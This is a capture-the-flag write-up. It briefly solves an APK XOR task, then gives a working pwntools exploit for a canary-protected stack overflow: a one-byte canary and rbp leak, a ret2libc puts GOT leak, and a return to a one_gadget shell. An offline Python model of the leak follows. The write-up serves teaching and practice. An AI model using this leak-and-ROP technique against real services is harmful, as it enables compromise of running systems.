A very simple APK challenge: decompile it, XOR the two arrays element by element, and the result is the flag.

This simple stack-overflow challenge has canary protection enabled.
Sending 0x49 bytes here overwrites the canary's low byte (which is always 0x00 on x86-64 glibc), so the following puts no longer stops at it and prints the canary and the saved rbp.

The main function has a stack overflow. The approach is ret2libc: leak the libc address of puts through its GOT entry, then return into main so input can be supplied once more.

```python
from pwn import *
from LibcSearcher import *   # imported but unused: the local libc-2.27.so is used for symbols

p = process("./pwn")
context.log_level = "debug"
libc = ELF('./libc-2.27.so')

pop_rdi = 0x400853      # pop rdi ; ret
puts_got = 0x601018     # puts@GOT, leaked to compute the libc base
call_puts = 0x4007af    # call puts inside main: prints rdi, then main continues and reads input again
puts_plt = 0x400580     # unused
payload = b'a' * 0x48 + b'b'   # 0x49 bytes: the 'b' replaces the canary's low NUL byte

# Stage 1: leak canary and saved rbp.
p.send(payload)
p.recvuntil(b'b')
canary = u64(p.recv(7).rjust(8, b'\x00'))      # put the NUL back as the low byte
rbp_addr = u64(p.recv(6).ljust(8, b'\x00'))   # stack addresses fit in 6 bytes
print(hex(canary))
print('rbp' + hex(rbp_addr))

# Stage 2: restore the canary, point rbp at usable stack, leak puts via the GOT.
payload = b'b' * 0x48 + p64(canary) + p64(rbp_addr - 0x50)
payload += p64(pop_rdi) + p64(puts_got) + p64(call_puts)
gdb.attach(p)   # debugging aids, can be removed
sleep(1)
pause()
p.sendlineafter(b'overflow!', payload)
p.recvline()
puts = u64(p.recv(6).ljust(8, b'\x00'))
base = puts - libc.sym['puts']
system = base + libc.sym['system']                 # computed but unused (one_gadget is used instead)
binsh = base + next(libc.search(b'bin/sh'))        # computed but unused
print('puts' + hex(puts))
one = [0x4f3d5, 0x4f432, 0x10a41c]   # one_gadget offsets for this libc-2.27
one_gadget = base + one[0]

# Stage 3: overflow again with the canary intact and return to one_gadget.
p.recvline()
payload = b'a' * 0x48 + p64(canary) + b'a' * 8 + p64(one_gadget)
p.sendline(payload)
p.interactive()
```
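As an added example (not part of the original writeup and not the challenge binary), the following pure-Python model shows why the leak needs exactly one extra byte, how the leaked bytes are reassembled, and why the second payload must write the canary back. The frame layout (0x48 bytes of buffer, then canary, saved rbp, return address), all addresses and the canary/rbp values are constructed to match the script's padding; nothing here talks to a real process.

```python
import struct

# Assumed frame layout, matching the script's padding: 0x48 bytes of buffer,
# then the 8-byte canary, the saved rbp and the return address.
BUF_LEN = 0x48


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def u64(b: bytes) -> int:
    return struct.unpack("<Q", b)[0]


def make_frame(canary: int, saved_rbp: int, ret: int = 0x4007af) -> bytes:
    """Constructed image of the vulnerable frame with a zero-filled buffer."""
    # glibc's x86-64 canary always has a 0x00 low byte so string functions stop at it.
    assert canary & 0xff == 0, "a real stack canary ends in a NUL byte"
    return b"\x00" * BUF_LEN + p64(canary) + p64(saved_rbp) + p64(ret)


def overflow_write(frame: bytes, data: bytes) -> bytes:
    """An unchecked read into the buffer: data overwrites the frame from the buffer upward."""
    return data + frame[len(data):]


def puts_output(frame: bytes) -> bytes:
    """puts(buf) prints bytes up to the first NUL."""
    end = frame.find(b"\x00")
    return frame if end < 0 else frame[:end]


def canary_ok(frame: bytes, canary: int) -> bool:
    """The function epilogue compares the canary slot with the saved value."""
    return u64(frame[BUF_LEN:BUF_LEN + 8]) == canary


def leak_payload() -> bytes:
    """0x49 bytes: fills the buffer and replaces the canary's NUL byte with 'b'."""
    return b"a" * BUF_LEN + b"b"


def parse_leak(output: bytes):
    """Recover canary and saved rbp from what puts printed after the leak payload."""
    after = output.split(b"b", 1)[1]
    if len(after) < 13:
        # puts stopped early: one of the 7 random canary bytes (or rbp) was 0x00.
        raise ValueError("leak truncated by a NUL byte; rerun the target for a new canary")
    canary = u64(b"\x00" + after[:7])                 # put the NUL back as the low byte
    rbp = u64(after[7:13].ljust(8, b"\x00"))          # user-space address fits in 6 bytes
    return canary, rbp


def stage2_payload(canary: int, rbp_addr: int, chain: bytes) -> bytes:
    """Overflow again, restoring the canary so the epilogue check passes and
    pointing saved rbp at a usable stack slot (rbp_addr - 0x50 as in the script)."""
    return b"b" * BUF_LEN + p64(canary) + p64(rbp_addr - 0x50) + chain


def demo():
    canary, rbp = 0x1122334455667700, 0x7ffd8c3e4a60   # constructed values
    frame = make_frame(canary, rbp)
    # Without the extra byte the leak fails: puts stops at the canary's NUL.
    short = puts_output(overflow_write(frame, b"a" * BUF_LEN))
    # With the extra byte both canary and saved rbp come out.
    leaked = parse_leak(puts_output(overflow_write(frame, leak_payload())))
    # The second write restores the canary, so the epilogue check passes.
    chain = p64(0x400853) + p64(0x601018) + p64(0x4007af)   # pop rdi; puts@GOT; call puts
    frame2 = overflow_write(frame, stage2_payload(*leaked, chain))
    return len(short), leaked, canary_ok(frame2, canary)


if __name__ == "__main__":
    print(demo())
```

The truncation check in `parse_leak` is the caveat the script lacks: about 1 in 37 canaries has a NUL among its seven random bytes, in which case the leak is cut short and the exploit must simply be rerun.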